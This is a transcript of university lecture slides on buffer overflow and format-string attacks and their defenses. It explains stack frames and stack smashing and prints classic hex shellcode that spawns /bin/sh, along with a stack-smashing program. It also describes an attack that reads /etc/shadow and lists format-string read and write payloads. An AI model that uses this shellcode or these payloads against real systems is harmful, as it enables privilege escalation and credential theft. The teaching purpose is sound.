Buffer Overflows and Defenses

Slides:



Advertisements
Similar presentations
Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
Advertisements

Smashing the Stack for Fun and Profit
Defenses. Preventing hijacking attacks 1. Fix bugs: – Audit software Automated tools: Coverity, Prefast/Prefix. – Rewrite software in a type safe languange.
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.
Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 11 – Buffer Overflow.
Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.
CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
University of Washington Last Time For loops  for loop → while loop → do-while loop → goto version  for loop → while loop → goto “jump to middle” version.
Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus Microsoft Research Brandon Baker Microsoft Carl Hartung CSCI 7143:
Foundations of Network and Computer Security J J ohn Black Lecture #29 Nov 12 th 2007 CSCI 6268/TLEN 5831, Fall 2007.
Buffer Overflow. Process Memory Organization.
© 2003 School of Computing, University of Leeds SY32 Secure Computing, Lecture 13 Implementation Flaws Part 1: Buffer Overruns.
Foundations of Network and Computer Security J J ohn Black Lecture #17 Oct 26 th 2004 CSCI 6268/TLEN 5831, Fall 2004.
Foundations of Network and Computer Security J J ohn Black Lecture #18 Oct 28 th 2004 CSCI 6268/TLEN 5831, Fall 2004.
Foundations of Network and Computer Security J J ohn Black Lecture #19 Nov 3 rd 2005 CSCI 6268/TLEN 5831, Fall 2005.
Assembly תרגול 8 פונקציות והתקפת buffer.. Procedures (Functions) A procedure call involves passing both data and control from one part of the code to.
Foundations of Network and Computer Security J J ohn Black Lecture #28 Nov 9 th 2009 CSCI 6268/TLEN 5550, Fall 2009.
Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 13 th 2009 CSCI 6268/TLEN 5550, Fall 2009.
Foundations of Network and Computer Security J J ohn Black Lecture #18 Nov 1 st 2005 CSCI 6268/TLEN 5831, Fall 2005.
Lecture 16 Buffer Overflow
Address Space Layout Permutation
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.
Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Understand stack Buffer overflow attack and defense Controls against program threats.
University of Washington Today Memory layout Buffer overflow, worms, and viruses 1.
CrackChat #2 Stack Overflows and Format Strings Part 2: Baking the Egg
Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.
Mitigation of Buffer Overflow Attacks
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 10 “Buffer Overflow”.
1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }
University of Washington Today Happy Monday! HW2 due, how is Lab 3 going? Today we’ll go over:  Address space layout  Input buffers on the stack  Overflowing.
Buffer Overflow CS461/ECE422 Spring Reading Material Based on Chapter 11 of the text.
Buffer Overflow Attack-proofing by Transforming Code Binary Gopal Gupta Parag Doshi, R. Reghuramalingam The University of Texas at Dallas 11/15/2004.
Smashing the Stack Overview The Stack Region Buffer Overflow
Buffer Overflow. Introduction On many C implementations, it is possible to corrupt the execution stack by writing past the end of an array. Known as smash.
Overflows & Exploits. In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating,
Lecture 8: Buffer Overflow CS 436/636/736 Spring 2013 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Buffer Overflow Proofing of Code Binaries By Ramya Reguramalingam Graduate Student, Computer Science Advisor: Dr. Gopal Gupta.
Buffer Overflow Attack Proofing of Code Binary Gopal Gupta, Parag Doshi, R. Reghuramalingam, Doug Harris The University of Texas at Dallas.
Lecture 9: Buffer Ovefflows and ROP EEN 312: Processors: Hardware, Software, and Interfacing Department of Electrical and Computer Engineering Spring 2014,
Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium
1 Understanding Pointers Buffer Overflow. 2 Outline Understanding Pointers Buffer Overflow Suggested reading –Chap 3.10, 3.12.
Information Security - 2. A Stack Frame. Pushed to stack on function CALL The return address is copied to the CPU Instruction Pointer when the function.
Slides by Kent Seamons and Tim van der Horst Last Updated: Nov 11, 2011.
Buffer Overflow Attacks 1 Basic Idea Sample Attacks Protection , Computer & Network Security.
VM: Chapter 7 Buffer Overflows. csci5233 computer security & integrity (VM: Ch. 7) 2 Outline Impact of buffer overflows What is a buffer overflow? Types.
Analyzing C/C++ Vulnerabilities -- Mike Gerschefske.
CS 3214 Computer Systems Godmar Back Lecture 7. Announcements Stay tuned for Project 2 & Exercise 4 Project 1 due Sep 16 Auto-fail rule 1: –Need at least.
Chapter 10 Buffer Overflow 1. A very common attack mechanism o First used by the Morris Worm in 1988 Still of major concern o Legacy of buggy code in.
1 Introduction to Information Security , Spring 2016 Lecture 2: Control Hijacking (2/2) Avishai Wool.
CS703 - Advanced Operating Systems By Mr. Farhan Zaidi.
@Yuan Xue Worm Attack Yuan Xue Fall 2012.
Buffer Overflows and Defenses
Mitigation against Buffer Overflow Attacks
Buffer Overflow Buffer overflows are possible because C doesn’t check array boundaries Buffer overflows are dangerous because buffers for user input are.
The Hardware/Software Interface CSE351 Winter 2013
CMSC 414 Computer and Network Security Lecture 21
Software Security.
Machine-Level Programming 4 Procedures
CS 465 Buffer Overflow Slides by Kent Seamons and Tim van der Horst
Assembly Language Programming II: C Compiler Calling Sequences
Foundations of Network and Computer Security
Lecture 9: Buffer Overflow*
Machine Level Representation of Programs (IV)
Foundations of Network and Computer Security
Presentation transcript:

Buffer Overflows and Defenses CS 419: Computer Security

Buffer Overflow a very common attack mechanism from 1988 Morris Worm to Code Red, Slammer, Sasser and many others prevention techniques known still of major concern due to legacy of widely deployed buggy continued careless programming techniques In this chapter we turn our attention specifically to buffer overflow attacks. This type of attack is one of the most common attacks seen, and results from careless programming in applications. This type of attack has been known since it was first widely used by the Morris Internet Worm in 1988, and techniques for preventing its occurrence are well known and documented. Unfortunately due to both a legacy of buggy code in widely deployed operating systems and applications, and continuing careless programming practices by programmers, it is still a major source of concern to security practitioners.

Buffer Overflow Basics caused by programming error allows more data to be stored than capacity available in a fixed sized buffer buffer can be on stack, heap, global data overwriting adjacent memory locations corruption of program data unexpected transfer of control memory access violation execution of code chosen by attacker A buffer overflow can occur as a result of a programming error when a process attempts to store data beyond the limits of a fixed-sized buffer, and consequently overwrites adjacent memory locations. These locations could hold other program variables or parameters, or program control flow data such as return addresses and pointers to previous stack frames. The buffer could be located on the stack, in the heap, or in the data section of the process. The consequences of this error include corruption of data used by the program, unexpected transfer of control in the program, possibly memory access violations, and very likely eventual program termination. When done deliberately as part of an attack on a system, the transfer of control could be to code of the attacker’s choosing, resulting in the ability to execute arbitrary code with the privileges of the attacked process.

Buffer overflow example int foo(void){ char buf[10]; … strcpy(buf, “hello world”); } int get_user_input(void){ char buf[LEN]; … gets(buf); }

Buffer Overflow Example To illustrate the basic operation of a buffer overflow, consider the C main function given in Figure 11.1a. This contains three variables (valid, str1 and str2), whose values will typically be saved in adjacent memory locations. The purpose of the code fragment is to call the function next_tag(str1) to copy into str1 some expected tag value, eg “START”. It then reads the next line from the standard input for the program using the C library gets() function, and then compares the string read with the expected tag. If the next line did indeed contain just the string “START”, this comparison would succeed, and the variable valid would be set to TRUE. This case is shown in the first of the three example program runs in Figure 11.1b. Any other input tag would leave it with the value FALSE. The problem with this code exists because the traditional C library gets() function does not include any checking on the amount of data copied. If more than 7 characters are present on the input line, when read in they will (along with the terminating NULL character) require more room than is available in the str2 buffer. Consequently the extra characters will proceed to overwrite the values of the adjacent variable, str1 in this case. For example, if the input line contained “EVILINPUTVALUE”, the result will be that str1 will be overwritten with the characters “TVALUE”, and str2 will use not only the 8 characters allocated to it, but 7 more from str1 as well. This can be seen in the second example run in Figure 11.1b. Knowing the structure of the code processing it, an attacker could arrange for the overwritten value to set the value in str1 equal to the value placed in str2, resulting in the subsequent comparison succeeding. For example, the input line could be the string “BADINPUTBADINPUT”. This results in the comparison succeeding, as shown in the third of the three example program runs.

Buffer Overflow Attacks to exploit a buffer overflow an attacker must identify a buffer overflow vulnerability in some program inspection, tracing execution, fuzzing tools understand how buffer is stored in memory and determine potential for corruption To exploit any type of buffer overflow, such as those we have illustrated here, the attacker needs to identify both: a buffer overflow vulnerability in some program that can be triggered using externally sourced data under the attackers control, and 2. to understand how that buffer will be stored in the processes memory, and hence the potential for corrupting adjacent memory locations and potentially altering the flow of execution of the program. Identifying vulnerable programs may be done by inspection of program source, tracing the execution of programs as they process oversized input, or using tools such as “fuzzing”. What the attacker does with the resulting corruption of memory varies considerably, depending on what values are being overwritten.

Why are they dangerous? Can trash memory, crashing the program Can be used to hijack the program. Spawn a shell or execute code with the privileges of the program ``setuid root’’ programs are particularly dangerous if exploited.

A Little Programming Language History at machine level all data an array of bytes interpretation depends on instructions used modern high-level languages have a strong notion of type and valid operations not vulnerable to buffer overflows does incur overhead, some limits on use C and related languages have high-level control structures, but allow direct access to memory hence are vulnerable to buffer overflow have a large legacy of widely used, unsafe, and hence vulnerable code Before exploring buffer overflows further, it is worth considering just how the potential for their occurance developed, and why programs are not necessarily protected from such errors. To understand this, we need to briefly consider the history of programming languages, and the fundamental operation of computer systems. At the basic machine level, all of the data manipulated by machine instructions executed by the computer processor are stored in either the processor’s registers or in memory. The data are simply arrays of bytes. Their interpretation is entirely determined by the function of the instructions accessing them. At the other end of the abstraction spectrum, modern high-level programming languages like Java, ADA, Python, and many others, have a very strong notion of the type of variables, and what constitutes permissible operations on them. Such languages do not suffer from buffer overflows. But this flexibility and safety comes at a cost in resource use, both at compile time, and in additional code that must executed at run-time to impose checks such as that on buffer limits. The distance from the underlying machine language and architecture also means that access to some instructions and hardware resources is lost. In between these extremes are languages such as C and its derivatives, which have many modern high-level control structures and data type abstractions, but which still provide the ability to access and manipulate memory data directly. Unfortunately, this means the language is susceptible to inappropriate use of memory contents. As has occurred in a number of common standard library functions. There is a large legacy body of code using unsafe functions, which are thus potentially vulnerable to buffer overflows.

Programs and Processes At this point, it is useful to step back and take a somewhat wider view of a running program, and the placement of key regions such as the program code, global data, heap and stack. When a program is run, the operating system typically creates a new process for it. The process is given its own virtual address space, with a general structure as shown in Figure 11.4. This consists of the contents of the executable program file (including global data, relocation table, and actual program code segments) near the bottom of this address space, space for the program heap to then grow upwards from above the code, and room for the stack to grow down from near the middle (if room is reserved for kernel space in the upper half) or top. The stack frames we discussed are hence placed one below another in the stack area, as the stack grows downwards through memory.

Function Calls and Stack Frames To better understand how buffer overflows work, we first take a brief digression into the mechanisms used by program functions to manage their local state on each call. When one function calls another, at the very least it needs somewhere to save the return address so the called function can return control when it finishes. Aside from that, it also needs locations to save the parameters to be passed in to the called function, and also possibly to save register values that it wishes to continue using when the called function returns. All of this data is usually saved on the stack in a structure known as a stack frame. One further piece of information then needed is some means of chaining these frames together. Figure 11.3 illustrates such a stack frame structure. See details in text of steps performed when one function calls another. As has been indicated before, the precise implementation of these steps is language, compiler and processor architecture dependent. However, something similar will usually be found in most cases.

The stack void function(int a, int b, intc ){ char buf1[5]; … } Void main() { function(1, 2, 3); c b ebp a buf1 buf2 esp

The stack void main() { function(1, 2, 3); } pushl $3 pushl $2 b pushl $3 pushl $2 pushl $1 call function ebp a pushl $3 pushl $2 pushl $1 call function esp

A function call void main() { function(1, 2, 3); } pushl $3 pushl $2 ebp void main() { function(1, 2, 3); } esp c b pushl $3 pushl $2 pushl $1 call function a return addr ebp ebp pushl %ebp movl %esp, %ebp subl $20, %esp esp

Digression: x86 tutorial pushl %ebp: Pushes ebp onto the stack. movl %esp,%ebp: Moves the current value of esp to the register ebp. subl $0x4,%esp: Subtract 4 (hex) from value of esp call 0x8000470 <function>: Calls the function at address 0x8000470. Also pushes the return address onto the stack. movl $0x1,0xfffffffc(%ebp): Move 0x1 into the memory pointed to by ebp - 4 leal 0xfffffffc(%ebp),%eax: Load address of the memory location pointed to by ebp -4 into eax ret: Return. Jumps to return address saved on stack. nop

Stack Buffer Overflow occurs when buffer is located on stack used by Morris Worm “Smashing the Stack” paper popularized it have local variables below saved frame pointer and return address hence overflow of a local buffer can potentially overwrite these key control items attacker overwrites return address with address of desired code program, system library or loaded in buffer A stack buffer overflow occurs when the targeted buffer is located on the stack, usually as a local variable in a function’s stack frame. This form of attack is also referred to as stack smashing. Stack buffer overflow attacks have been exploited since first being seen in the wild in the Morris Internet Worm in 1988. The publication by Aleph One (Elias Levy) of details of the attack and how to exploit it [LEVY96] hastened further use of this technique, which is still widely exploited. Because the local variables are placed below the saved frame pointer and return address, the possibility exists of exploiting a local buffer variable overflow vulnerability to overwrite the values of one or both of these key function linkage values. This possibility of overwriting the saved frame pointer and return address forms the core of a stack overflow attack. The attacker can overwrite the return address with any desired value, not just the address of the targeted function. It could be the address of any function, or indeed of any sequence of machine instructions present in the program or its associated system libraries. However, the approach used in the original attacks was to include the desired machine code in the buffer being overflowed.

A benign buffer overflow void function(char *str){ char buffer[16]; strcpy (buffer, str); } void main() { char largestr[256]; int i; for (i=0;i<255;i++) { largestr[i] = ‘A’ function(largestr); str Return addr Saved ebp buffer This program causes a segfault. Why?

Stack Overflow Example To illustrate the operation of a classic stack overflow, consider the C function given in Figure 11.5a. It contains a single local variable, the buffer inp. This hello function (a version of the classic Hello World program), prompts for a name, which it then reads into the buffer inp using the unsafe gets() library routine. It then displays the value read using the printf() library routine. As long as a small value is read in there will be no problems and the program calling this function will run successfully, as shown in the first of the example program runs in Figure 11.5b. However, if too much data is input, as shown in the second of the example program runs in Figure 11.5b, then the data extends beyond the end of the buffer and ends up overwriting the saved frame pointer and return address with garbage values (corresponding to the binary representation of the characters supplied). Then, when the function attempts to transfer control to the return address, it typically jumps to an illegal memory location, resulting in a “Segmentation Fault” and the abnormal termination of the program, as shown. Of more interest to the attacker, rather than immediately crashing the program, is to have it transfer control to a location and code of the attacker’s choosing. We can illustrate this process using this function, to start re-executing the hello function, rather then returning to the calling main routine. To do this we need to find the address at which the hello function will be loaded. . The easiest way to determine this is to run a debugger on the target program, and disassemble the target function. When done it is found at address 0x08048394. For the purpose of this demonstration I used a simple one-line Perl program, whose pack() function can be easily used to convert a hexadecimal string into its binary equivalent, as can be seen in the third of the example program runs in Figure 11.5b

Another Stack Overflow In all the examples used so far, the buffer overflow has occurred when the input was read. The possibility also exists that a program can safely read and save input, pass it around the program, and then at some later time in another function unsafely copy it, resulting in a buffer overflow. Figure 11.7a shows an example program illustrating this behavior. The main() function includes the buffer buf. This is passed along with its size to the function getinp() which safely reads a value using fgets(). The getinp()function then returns to main(), which then calls the function display() with the value in buf. This function constructs a response string in a second local buffer called tmp and then displays this. Unfortunately, the sprintf() library routine is another common, unsafe C library routine. Note in this program that the buffers are both the same size. The problem that may result occurs when data is being merged into a buffer that includes the contents of another buffer, such that the space needed exceeds the space available.

Another Stack Overflow Look at the example runs of this program shown in Figure 11.7b. For the first run, the value read is small enough that the merged response didn’t corrupt the stack frame. For the second run, the supplied input was much too large. However, because a safe input function was used, only 15 characters were read, as shown in the following line. When this was then merged with the response string, the result was larger than the space available in the destination buffer. In fact, it overwrote the saved frame pointer, but not the return address. So the function returned, as shown by the message printed by the main() function. But when main() tried to return, because its stack frame had been corrupted and was now some random value, the program jumped to an illegal address and crashed. In this case the combined result was not long enough to reach the return address, but this would be possible if a larger buffer size had been used.

Subverting control flow void function(char *str){ char buf1[5]; char buf2[10]; int *ret; ret = buf1 + 12; *ret += 8; } void main() { int x; x = 0; function(1, 2, 3); x = 1; printf (“%d\n”, x);

Code of “main” 0x8000490 <main>: pushl %ebp 0x8000491 <main+1>: movl %esp,%ebp 0x8000493 <main+3>: subl $0x4,%esp 0x8000496 <main+6>: movl $0x0,0xfffffffc(%ebp) 0x800049d <main+13>: pushl $0x3 0x800049f <main+15>: pushl $0x2 0x80004a1 <main+17>: pushl $0x1 0x80004a3 <main+19>: call 0x8000470 <function> 0x80004a8 <main+24>: addl $0xc,%esp 0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp) 0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax 0x80004b5 <main+37>: pushl %eax 0x80004b6 <main+38>: pushl $0x80004f8 0x80004bb <main+43>: call 0x8000378 <printf> 0x80004c0 <main+48>: addl $0x8,%esp 0x80004c3 <main+51>: movl %ebp,%esp 0x80004c5 <main+53>: popl %ebp 0x80004c6 <main+54>: ret 0x80004c7 <main+55>: nop

str 0xffff1234 Saved ebp buffer

Writing an exploit program #include <stdio.h> void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); }

0x8000130 <main>: pushl %ebp 0x8000131 <main+1>: movl %esp,%ebp 0x8000133 <main+3>: subl $0x8,%esp 0x8000136 <main+6>: movl $0x80027b8,0xfffffff8(%ebp) 0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp) 0x8000144 <main+20>: pushl $0x0 0x8000146 <main+22>: leal 0xfffffff8(%ebp),%eax 0x8000149 <main+25>: pushl %eax 0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax 0x800014d <main+29>: pushl %eax 0x800014e <main+30>: call 0x80002bc <__execve> 0x8000153 <main+35>: addl $0xc,%esp 0x8000156 <main+38>: movl %ebp,%esp 0x8000158 <main+40>: popl %ebp 0x8000159 <main+41>: ret

0x80002bc <__execve>: pushl %ebp 0x80002bd <__execve+1>: movl %esp,%ebp 0x80002bf <__execve+3>: pushl %ebx 0x80002c0 <__execve+4>: movl $0xb,%eax 0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx 0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx 0x80002cb <__execve+15>: movl 0x10(%ebp),%edx 0x80002ce <__execve+18>: int $0x80 0x80002d0 <__execve+20>: movl %eax,%edx 0x80002d2 <__execve+22>: testl %edx,%edx 0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42> 0x80002d6 <__execve+26>: negl %edx 0x80002d8 <__execve+28>: pushl %edx 0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location> 0x80002de <__execve+34>: popl %edx 0x80002df <__execve+35>: movl %edx,(%eax) 0x80002e1 <__execve+37>: movl $0xffffffff,%eax 0x80002e6 <__execve+42>: popl %ebx 0x80002e7 <__execve+43>: movl %ebp,%esp 0x80002e9 <__execve+45>: popl %ebp 0x80002ea <__execve+46>: ret 0x80002eb <__execve+47>: nop

Basic requirements. Have null terminated “/bin/sh” in memory Have address of this string in memory followed by null long word Copy 0xb into eax Copy address of string into ebx Copy address of sting into ecx Copy address of null long word into edx Execute int $0x80 (system call)

Attack payload. movl string_addr,string_addr_addr movb $0x0,null_byte_addr movl $0x0,null_addr movl $0xb,%eax movl string_addr,%ebx leal string_addr,%ecx leal null_string,%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx /bin/sh string goes here. Where in the memory space of the process will this be placed? Use relative addressing!

Attack payload. jmp offset-to-call # 2 bytes popl %esi # 1 byte movl %esi,array-offset(%esi) # 3 bytes movb $0x0,nullbyteoffset(%esi)# 4 bytes movl $0x0,null-offset(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal array-offset,(%esi),%ecx # 3 bytes leal null-offset(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes call offset-to-popl # 5 bytes /bin/sh string goes here.

Hex representation of code. char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } Use gdb to create this!

Zeroes in attack payload movb $0x0,0x7(%esi) molv $0x0,0xc(%esi) xorl %eax,%eax movb %eax,0x7(%esi) movl %eax,0xc(%esi) movl $0xb,%eax movb $0xb,%al movl $0x1, %eax movl $0x0, %ebx xorl %ebx,%ebx movl %ebx,%eax inc %eax

A stack smashing attack char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); }

Example Shellcode Given the above limitations what results from this design process is code similar to that shown in Figure 11.8b. This code is written in x86 assembly language, as used by Pentium processors. In general this code implements the functionality specified in the original C program in text Figure 11.8a. However there are a few unique features. The first is how the string “/bin/sh” is referenced. In shellcode it must be included along with the instructions, typically located just after them. In order to then refer to this string, the code must determine the address where it is located, relative to the current instruction address. This can be done using a novel, non-standard use of the CALL instruction. The next issue is ensuring that no NULLs occur in the shellcode. This means a zero value cannot be used in any instruction argument, or in any constant data. Instead, any required zero values must be generated and saved as the code runs. The logical XOR instruction of a register value with itself generates a zero value. This value can then be copied anywhere needed, such as the end of the string, and also as the value of args[1]. To deal with the inability to precisely determine the starting address of this code, the attacker can exploit the fact that the code is often much smaller than the space available in the buffer (just 40 bytes long in this example). By the placing the code near the end of the buffer, the attacker can pad the space before it with NOP instructions. Because these instructions do nothing, the attacker can specify the return address used to enter this code as a location somewhere in this run of NOPs, which is called a NOP sled. When this code is assembled, the resulting machine code is shown in hexadecimal in Figure 11.8c.

Example Stack Overflow Attack We now have all of the components needed to understand a stack overflow attack. To illustrate how such an attack is actually executed, we use a target program that is a variant on that shown in Figure 11.5a. Having identified a suitable, vulnerable, trusted utility program, the attacker has to analyze it to determine the likely location of the targeted buffer on the stack, and how much data is needed to reach up to and overflow the old frame pointer and return address in it’s stack frame. When this was done with our demonstration program, the buffer inp was found to start at address 0xbffffbb0, the current frame pointer (in %ebp) was 0xbffffc08, and the saved frame pointer at that address was 0xbffffc38. This means that 0x58 or 88 bytes are needed to fill the buffer and reach the saved frame pointer. Allowing first a few more spaces at the end to provide room for the args array, the NOP sled at the start is extended until a total of exactly 88 bytes are used. The new frame pointer value can be left as 0xbffffc38, and the target return address value can be set to 0xbffffbc0 which places it around the middle of the NOP sled. Next, there must be a newline character to end this (overlong) input line which gets() will read. This gives a total of 97 bytes. Once again a small perl program is used to convert the hexadecimal representation of this attack string into binary to implement the attack. The attacker must also specify the commands to be run by the shell once the attack succeeds. These also must be written to the target program, as the spawned Bourne shell will be reading from the same standard input as the program it replaces. In this example, we will run two UNIX commands: whoami and cat /etc/shadow. Figure 11.9 shows this attack being executed.

Motivation Format-string vulnerability //Format & enter into LOG void log(char *fmt,...){ fprintf(LOG,fmt,...); return; } //Call log on user input int foo(void){ char buf[LEN]; … fgets(buf,LEN-1,FILE); log(buf); Format-string vulnerability buf = “%s%s%s” fprintf(LOG,“%s%s%s”) Insufficient arguments to fprintf.Possible outcomes Unintelligible log entry. Program crash. Hacker takes over program! ICSE 2005 Automatic Discovery of API-Level Exploits

Format-string vulnerabilities Allow intruder to assume privileges of the victim program. Highly prevalent. [CERT] ICSE 2005 Automatic Discovery of API-Level Exploits

Overview of printf ICSE 2005 Automatic Discovery of API-Level Exploits //Format & enter into LOG void log(char *fmt,...){ fprintf(LOG,fmt,...); return; } //Call log on user input int foo(void){ char buf[LEN]; … fgets(buf,LEN-1,FILE); log(buf); High addresses Stack growth Pointers Low addresses ICSE 2005 Automatic Discovery of API-Level Exploits

Overview of printf LEN buf ICSE 2005 //Format & enter into LOG void log(char *fmt,...){ fprintf(LOG,fmt,...); return; } //Call log on user input int foo(void){ char buf[LEN]; … fgets(buf,LEN-1,FILE); log(buf); LEN buf ICSE 2005 Automatic Discovery of API-Level Exploits

Overview of printf LEN buf Pointer to buf ICSE 2005 //Format & enter into LOG void log(char *fmt,...){ fprintf(LOG,fmt,...); return; } //Call log on user input int foo(void){ char buf[LEN]; … fgets(buf,LEN-1,FILE); log(buf); LEN buf Pointer to buf ICSE 2005 Automatic Discovery of API-Level Exploits

Overview of printf LEN buf Stack frame of log ICSE 2005 //Format & enter into LOG void log(char *fmt,...){ fprintf(LOG,fmt,...); return; } //Call log on user input int foo(void){ char buf[LEN]; … fgets(buf,LEN-1,FILE); log(buf); LEN buf Stack frame of log ICSE 2005 Automatic Discovery of API-Level Exploits

Overview of printf LEN buf Pointer to buf ICSE 2005 //Format & enter into LOG void log(char *fmt,...){ fprintf(LOG,fmt,...); return; } //Call log on user input int foo(void){ char buf[LEN]; … fgets(buf,LEN-1,FILE); log(buf); LEN buf Pointer to buf ICSE 2005 Automatic Discovery of API-Level Exploits

Overview of printf LEN buf Stack frame of fprintf ICSE 2005 //Format & enter into LOG void log(char *fmt,...){ fprintf(LOG,fmt,...); return; } //Call log on user input int foo(void){ char buf[LEN]; … fgets(buf,LEN-1,FILE); log(buf); LEN buf Stack frame of fprintf ICSE 2005 Automatic Discovery of API-Level Exploits

Overview of printf LEN buf fmtptr DIS argptr ICSE 2005 //Format & enter into LOG void log(char *fmt,...){ fprintf(LOG,fmt,...); return; } //Call log on user input int foo(void){ char buf[LEN]; … fgets(buf,LEN-1,FILE); log(buf); LEN buf fmtptr DIS argptr ICSE 2005 Automatic Discovery of API-Level Exploits

Overview of printf LEN buf fmtptr DIS argptr buf = “%x%x%s” ICSE 2005 //Format & enter into LOG void log(char *fmt,...){ fprintf(LOG,fmt,...); return; } //Call log on user input int foo(void){ char buf[LEN]; … fgets(buf,LEN-1,FILE); log(buf); LEN buf fmtptr DIS argptr buf = “%x%x%s” ICSE 2005 Automatic Discovery of API-Level Exploits

Overview of printf fmtptr LEN buf DIS argptr 4 bytes, integer //Format & enter into LOG void log(char *fmt,...){ fprintf(LOG,fmt,...); return; } //Call log on user input int foo(void){ char buf[LEN]; … fgets(buf,LEN-1,FILE); log(buf); fmtptr LEN buf DIS argptr 4 bytes, integer buf = “%x%x%s” ICSE 2005 Automatic Discovery of API-Level Exploits

Overview of printf fmtptr LEN buf DIS argptr 4 bytes, integer //Format & enter into LOG void log(char *fmt,...){ fprintf(LOG,fmt,...); return; } //Call log on user input int foo(void){ char buf[LEN]; … fgets(buf,LEN-1,FILE); log(buf); fmtptr LEN buf DIS argptr 4 bytes, integer buf = “%x%x%s” ICSE 2005 Automatic Discovery of API-Level Exploits

Overview of printf fmtptr LEN buf argptr DIS 4 bytes, address //Format & enter into LOG void log(char *fmt,...){ fprintf(LOG,fmt,...); return; } //Call log on user input int foo(void){ char buf[LEN]; … fgets(buf,LEN-1,FILE); log(buf); fmtptr LEN buf argptr DIS 4 bytes, address buf = “%x%x%s” ICSE 2005 Automatic Discovery of API-Level Exploits

Format-string Exploits fmtptr What if we move argptr into buf? Remember, attacker can control buf! LEN buf argptr DIS ICSE 2005 Automatic Discovery of API-Level Exploits

Format-string Exploits Example exploit scenario: fmtptr is at a “%s” buf contains an attacker-chosen address. argptr points to this location within buf Can read from arbitrary memory location! Writes also possible! Using %n fmtptr %s LEN address argptr DIS ICSE 2005 Automatic Discovery of API-Level Exploits

Format-string Exploits Exploit technique just discussed is well-known fmtptr LEN buf Key observations: DIS and LEN completely characterize any printf call. 2. Each byte in buf instructs printf what to do next. argptr DIS ICSE 2005 Automatic Discovery of API-Level Exploits

Examples DIS Read exploit Write exploit 7 4 16 8 20 24 32 LEN 7 “a1a2a3a4%s” No exploit 4 16 “a1a2a3a4%d%s” “%234Lg%na1a2a3a4” “%Lx%ld%sa1a2a3a4” “a1a2a3a4%%%229x%n” 8 “a1a2a3a4%Lx%s” “a1a2a3a4%230g%n” “%Lg%Lg%sa1a2a3a4” “a1a2a3a4%137g%93g%n” 20 “a1a2a3a4%Lg%g%s” “a1a2a3a4%210Lg%20g%n” 24 “a1a2a3a4%Lg%Lg%s” “a1a2a3a4%61Lg%169Lg%n” 32 “a1a2a3a4%g%Lg%Lg%s” “a1a2a3a4%78Lg%80g%72Lg%n” ICSE 2005 Automatic Discovery of API-Level Exploits

Preventing Buffer Overflows Use safe programming languages, e.g., Java What about legacy C code? Black-box testing with long strings Mark stack as non-executable Randomize stack location or encrypt return address on stack by XORing with random string Attacker won’t know what address to use in his string Run-time checking of array and buffer bounds StackGuard, libsafe, many other tools Static analysis of source code to find overflows

Non-Executable Stack NX bit on every Page Table Entry AMD Athlon 64, Intel P4 “Prescott”, but not 32-bit x86 Code patches marking stack segment as non-executable exist for Linux, Solaris, OpenBSD Some applications need executable stack For example, LISP interpreters Does not defend against return-to-libc exploits Overwrite return address with the address of an existing library function (can still be harmful) …nor against heap and function pointer overflows

